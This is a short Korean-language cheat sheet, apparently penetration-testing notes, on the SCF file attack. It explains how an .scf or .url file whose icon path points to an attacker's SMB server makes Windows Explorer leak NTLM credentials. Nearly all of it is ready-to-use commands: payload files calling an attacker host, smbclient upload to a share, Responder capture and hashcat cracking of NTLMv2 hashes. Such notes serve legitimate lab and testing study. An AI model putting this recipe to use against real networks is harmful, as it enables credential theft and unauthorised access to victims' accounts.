# SCF File Attack 기본 개념 - `.scf` 파일: 아이콘 경로를 담고 있는 윈도우 설정 파일 - 윈도우 탐색기는 폴더에 `.scf` 파일이 있으면 자동으로 그 아이콘 경로를 열려고 함. - 아이콘 경로가 공격자의 SMB 서버라면? > 자동으로 피해자가 공격자에게 인증 시도. - 이 때 발생하는 NTLM 인증 정보를 공격자가 가로챈다. # SCF File Attack `.scf`파일 만들기 ```bash [Shell] Command=2 IconFile=\\<attacker-IP>\%USERNAME%.icon IconIndex=1 # 혹은 echo "[Shell]" > icon.scf echo "Command=2" >> icon.scf echo "IconFile=\\<attacker-IP>\%USERNAME%.icon" >> icon.scf echo "IconIndex=1" # 혹은 # icon.url 파일 확장자 = .url [InternetShortcut] URL=any WorkingDirectory=any IconFile=\\10.6.61.45\%USERNAME%.icon IconIndex=1 ``` 공유 폴더에 `.scf` 혹은 `.url` 파일 업로드 ```bash smbclient //<IP>/share put icon.scf ``` `Responder` 실행하고 기다리기 ```bash sudo responder -I tun0 ``` NTLMv2 hash 얻으면 hashcat으로 크래킹 진행 ```bash # NTLMv2는 모드 5600번 사용 hashcat -m 5600 -a 0 <hash.txt> <wordlist.txt> ```